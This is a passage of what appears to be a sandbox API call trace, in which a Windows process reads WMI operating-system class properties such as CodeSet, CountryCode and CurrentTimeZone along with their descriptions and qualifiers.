	[0050.658] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.658] SysStringLen (param_1="BuildType") returned 0x9
	[0050.658] SysStringLen (param_1="BootDevice") returned 0xa
	[0050.658] SysStringLen (param_1="BuildType") returned 0x9
	[0050.658] SysStringLen (param_1="BuildNumber") returned 0xb
	[0050.658] SysStringLen (param_1="BuildNumber") returned 0xb
	[0050.658] SysStringLen (param_1="BuildType") returned 0x9
	[0050.659] IUnknown:Release (This=0x233e12d21d0) returned 0x1
	[0050.659] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.659] IWbemClassObject:Get (in: This=0x233e12d2b60, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290c68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CodeSet", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.659] IWbemClassObject:Get (in: This=0x233e12d2b60, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12911a8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CodeSet", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.659] GetCurrentThreadId () returned 0xdf0
	[0050.659] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.659] IWbemClassObject:Get (in: This=0x233e12d2b60, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The CodeSet property indicates the code page value used by the operating system. A code page contains a character table used by the operating system to translate strings for different languages. The American National Standards Institute (ANSI) lists values that represent defined code pages. If the operating system does not use an ANSI code page, this member will be set to 0. The CodeSet string can use up to six characters to define the code page value./nExample: 1255.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.659] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.660] lstrlenA (lpString="") returned 0
	[0050.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fbd40, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.660] SysStringLen (param_1="The CodeSet property indicates the code page value used by the operating system. A code page contains a character table used by the operating system to translate strings for different languages. The American National Standards Institute (ANSI) lists values that represent defined code pages. If the operating system does not use an ANSI code page, this member will be set to 0. The CodeSet string can use up to six characters to define the code page value./nExample: 1255.") returned 0x1d8
	[0050.660] SysStringLen (param_1="") returned 0x0
	[0050.660] GetCurrentThreadId () returned 0xdf0
	[0050.660] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.660] IWbemClassObject:Get (in: This=0x233e12d2b60, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bd90*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1270ea0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.660] SafeArrayGetLBound (in: psa=0x233e128bd90, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0
	[0050.660] SafeArrayGetUBound (in: psa=0x233e128bd90, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0
	[0050.660] SafeArrayGetElement (in: psa=0x233e128bd90, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0
	[0050.660] IWbemClassObject:Get (in: This=0x233e12e4f20, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxLen", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.660] IWbemClassObject:Get (in: This=0x233e12e4f20, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bed0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e12711a0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.660] SafeArrayGetLBound (in: psa=0x233e128bed0, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0
	[0050.660] SafeArrayGetUBound (in: psa=0x233e128bed0, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0
	[0050.660] lstrlenW (lpString="CIMTYPE") returned 7
	[0050.660] lstrlenW (lpString="MaxLen") returned 6
	[0050.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0050.661] lstrlenW (lpString="read") returned 4
	[0050.661] lstrlenW (lpString="MaxLen") returned 6
	[0050.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="read", cchCount2=4) returned 1
	[0050.661] lstrlenW (lpString="write") returned 5
	[0050.661] lstrlenW (lpString="MaxLen") returned 6
	[0050.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0050.661] lstrlenW (lpString="In") returned 2
	[0050.661] lstrlenW (lpString="MaxLen") returned 6
	[0050.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0050.661] lstrlenW (lpString="Out") returned 3
	[0050.661] lstrlenW (lpString="MaxLen") returned 6
	[0050.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="Out", cchCount2=3) returned 1
	[0050.661] SafeArrayGetElement (in: psa=0x233e128bed0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.661] IUnknown:Release (This=0x233e12e4f20) returned 0x1
	[0050.661] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.662] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.662] SysStringLen (param_1="BuildNumber") returned 0xb
	[0050.662] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.662] SysStringLen (param_1="BuildType") returned 0x9
	[0050.662] SysStringLen (param_1="BuildType") returned 0x9
	[0050.662] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.662] IUnknown:Release (This=0x233e12d2b60) returned 0x1
	[0050.662] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.662] IWbemClassObject:Get (in: This=0x233e12d3160, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290ba8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CountryCode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.663] IWbemClassObject:Get (in: This=0x233e12d3160, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12912f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CountryCode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.663] GetCurrentThreadId () returned 0xdf0
	[0050.663] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.663] IWbemClassObject:Get (in: This=0x233e12d3160, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The CountryCode property indicates the code for the country/regionused by the operating system. Values are based on international phone dialing prefixes (also referred to as IBM country/region codes). The CountryCode string can use up to six characters to define the country/region code value./nExample: 1 for the United States)", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.663] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.663] lstrlenA (lpString="") returned 0
	[0050.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.663] SysStringLen (param_1="The CountryCode property indicates the code for the country/regionused by the operating system. Values are based on international phone dialing prefixes (also referred to as IBM country/region codes). The CountryCode string can use up to six characters to define the country/region code value./nExample: 1 for the United States)") returned 0x148
	[0050.663] SysStringLen (param_1="") returned 0x0
	[0050.663] GetCurrentThreadId () returned 0xdf0
	[0050.663] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.664] IWbemClassObject:Get (in: This=0x233e12d3160, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.664] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.664] SysStringLen (param_1="CountryCode") returned 0xb
	[0050.664] SysStringLen (param_1="BuildNumber") returned 0xb
	[0050.664] SysStringLen (param_1="CountryCode") returned 0xb
	[0050.664] SysStringLen (param_1="BuildType") returned 0x9
	[0050.664] SysStringLen (param_1="CountryCode") returned 0xb
	[0050.664] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.664] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.664] SysStringLen (param_1="CountryCode") returned 0xb
	[0050.664] IUnknown:Release (This=0x233e12d3160) returned 0x1
	[0050.664] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.665] IWbemClassObject:Get (in: This=0x233e12d3780, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1291088, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSDVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.665] IWbemClassObject:Get (in: This=0x233e12d3780, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1291028, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSDVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.665] GetCurrentThreadId () returned 0xdf0
	[0050.665] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.665] IWbemClassObject:Get (in: This=0x233e12d3780, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The CSDVersion property contains a null-terminated string, that indicates the latest Service Pack installed on the computer system. If no Service Pack is installed, the string is NULL. For computer systems running Windows 95, this property contains a null-terminated string that provides arbitrary additional information about the operating system./nExample: Service Pack 3.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.665] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.666] lstrlenA (lpString="") returned 0
	[0050.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.666] SysStringLen (param_1="The CSDVersion property contains a null-terminated string, that indicates the latest Service Pack installed on the computer system. If no Service Pack is installed, the string is NULL. For computer systems running Windows 95, this property contains a null-terminated string that provides arbitrary additional information about the operating system./nExample: Service Pack 3.") returned 0x176
	[0050.666] SysStringLen (param_1="") returned 0x0
	[0050.666] GetCurrentThreadId () returned 0xdf0
	[0050.666] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.666] IWbemClassObject:Get (in: This=0x233e12d3780, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.666] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.667] SysStringLen (param_1="CSDVersion") returned 0xa
	[0050.667] SysStringLen (param_1="BuildNumber") returned 0xb
	[0050.667] SysStringLen (param_1="CSDVersion") returned 0xa
	[0050.667] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.667] SysStringLen (param_1="CSDVersion") returned 0xa
	[0050.667] SysStringLen (param_1="BuildType") returned 0x9
	[0050.667] SysStringLen (param_1="BuildType") returned 0x9
	[0050.667] SysStringLen (param_1="CSDVersion") returned 0xa
	[0050.667] IUnknown:Release (This=0x233e12d3780) returned 0x1
	[0050.667] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.667] IWbemClassObject:Get (in: This=0x233e12d3a30, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290e18, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.668] IWbemClassObject:Get (in: This=0x233e12d3a30, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290bd8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.668] GetCurrentThreadId () returned 0xdf0
	[0050.668] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.668] IWbemClassObject:Get (in: This=0x233e12d3a30, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.668] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.668] lstrlenA (lpString="") returned 0
	[0050.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.669] GetCurrentThreadId () returned 0xdf0
	[0050.669] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.669] IWbemClassObject:Get (in: This=0x233e12d3a30, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.669] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.669] SysStringLen (param_1="CSName") returned 0x6
	[0050.669] SysStringLen (param_1="BuildNumber") returned 0xb
	[0050.669] SysStringLen (param_1="CSName") returned 0x6
	[0050.669] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.669] SysStringLen (param_1="CSName") returned 0x6
	[0050.669] SysStringLen (param_1="BuildType") returned 0x9
	[0050.669] SysStringLen (param_1="CSName") returned 0x6
	[0050.669] SysStringLen (param_1="CSDVersion") returned 0xa
	[0050.669] SysStringLen (param_1="CSDVersion") returned 0xa
	[0050.669] SysStringLen (param_1="CSName") returned 0x6
	[0050.670] IUnknown:Release (This=0x233e12d3a30) returned 0x1
	[0050.670] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.670] IWbemClassObject:Get (in: This=0x233e12d3f80, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1291148, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.670] IWbemClassObject:Get (in: This=0x233e12d3f80, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290c08, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.670] GetCurrentThreadId () returned 0xdf0
	[0050.670] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.671] IWbemClassObject:Get (in: This=0x233e12d3f80, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone indicates the number of minutes the operating system is offset from Greenwich Mean Time. Either the number is positive, negative or zero.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.671] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.671] lstrlenA (lpString="") returned 0
	[0050.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.671] SysStringLen (param_1="CurrentTimeZone indicates the number of minutes the operating system is offset from Greenwich Mean Time. Either the number is positive, negative or zero.") returned 0x99
	[0050.671] SysStringLen (param_1="") returned 0x0
	[0050.671] GetCurrentThreadId () returned 0xdf0
	[0050.671] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.671] IWbemClassObject:Get (in: This=0x233e12d3f80, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.671] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.672] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0050.672] SysStringLen (param_1="BuildNumber") returned 0xb
	[0050.672] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0050.672] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.672] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0050.672] SysStringLen (param_1="CountryCode") returned 0xb
	[0050.672] SysStringLen (param_1="CountryCode") returned 0xb
	[0050.672] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0050.672] IUnknown:Release (This=0x233e12d3f80) returned 0x1
	[0050.672] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.673] IWbemClassObject:Get (in: This=0x233e12d6170, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127ef48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Debug", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.673] IWbemClassObject:Get (in: This=0x233e12d6170, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128c348, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Debug", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.673] GetCurrentThreadId () returned 0xdf0
	[0050.673] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.673] IWbemClassObject:Get (in: This=0x233e12d6170, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Debug property indicates whether the operating system is a checked (debug) build. Checked builds provide error checking, argument verification, and system debugging code. Additional code in a checked binary generates a kernel debugger error message and breaks into the debugger. This helps  immediately determine the cause and location of the error. Performance suffers in the checked build due to the additional code that is executed./nValues: TRUE or FALSE, A value of TRUE indicates the debugging version of User.exe is installed.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.673] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.674] lstrlenA (lpString="") returned 0
	[0050.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc110, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.674] SysStringLen (param_1="The Debug property indicates whether the operating system is a checked (debug) build. Checked builds provide error checking, argument verification, and system debugging code. Additional code in a checked binary generates a kernel debugger error message and breaks into the debugger. This helps  immediately determine the cause and location of the error. Performance suffers in the checked build due to the additional code that is executed./nValues: TRUE or FALSE, A value of TRUE indicates the debugging version of User.exe is installed.") returned 0x219
	[0050.674] SysStringLen (param_1="") returned 0x0
	[0050.674] GetCurrentThreadId () returned 0xdf0
	[0050.674] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.674] IWbemClassObject:Get (in: This=0x233e12d6170, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.674] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.675] SysStringLen (param_1="Debug") returned 0x5
	[0050.675] SysStringLen (param_1="BuildNumber") returned 0xb
	[0050.675] SysStringLen (param_1="Debug") returned 0x5
	[0050.675] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.675] SysStringLen (param_1="Debug") returned 0x5
	[0050.675] SysStringLen (param_1="CountryCode") returned 0xb
	[0050.675] SysStringLen (param_1="Debug") returned 0x5
	[0050.675] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0050.675] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0050.675] SysStringLen (param_1="Debug") returned 0x5
	[0050.675] IUnknown:Release (This=0x233e12d6170) returned 0x1
	[0050.675] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.675] IWbemClassObject:Get (in: This=0x233e12d5ec0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290cc8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.676] IWbemClassObject:Get (in: This=0x233e12d5ec0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290c38, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.676] GetCurrentThreadId () returned 0xdf0
	[0050.676] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.676] IWbemClassObject:Get (in: This=0x233e12d5ec0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Description property provides a description of the Windows operating system. Some user interfaces (those that allow editing of this description) limit its length to 48 characters.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.676] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.680] lstrlenA (lpString="") returned 0
	[0050.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.680] SysStringLen (param_1="The Description property provides a description of the Windows operating system. Some user interfaces (those that allow editing of this description) limit its length to 48 characters.") returned 0xb7
	[0050.680] SysStringLen (param_1="") returned 0x0
	[0050.680] GetCurrentThreadId () returned 0xdf0
	[0050.680] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.681] IWbemClassObject:Get (in: This=0x233e12d5ec0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.681] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.681] SysStringLen (param_1="Description") returned 0xb
	[0050.681] SysStringLen (param_1="BuildNumber") returned 0xb
	[0050.681] SysStringLen (param_1="Description") returned 0xb
	[0050.681] SysStringLen (param_1="CodeSet") returned 0x7
	[0050.681] SysStringLen (param_1="Description") returned 0xb
	[0050.681] SysStringLen (param_1="CurrentTimeZone") returned 0xf
	[0050.681] SysStringLen (param_1="Description") returned 0xb
	[0050.681] SysStringLen (param_1="Debug") returned 0x5
	[0050.681] SysStringLen (param_1="Debug") returned 0x5
	[0050.681] SysStringLen (param_1="Description") returned 0xb
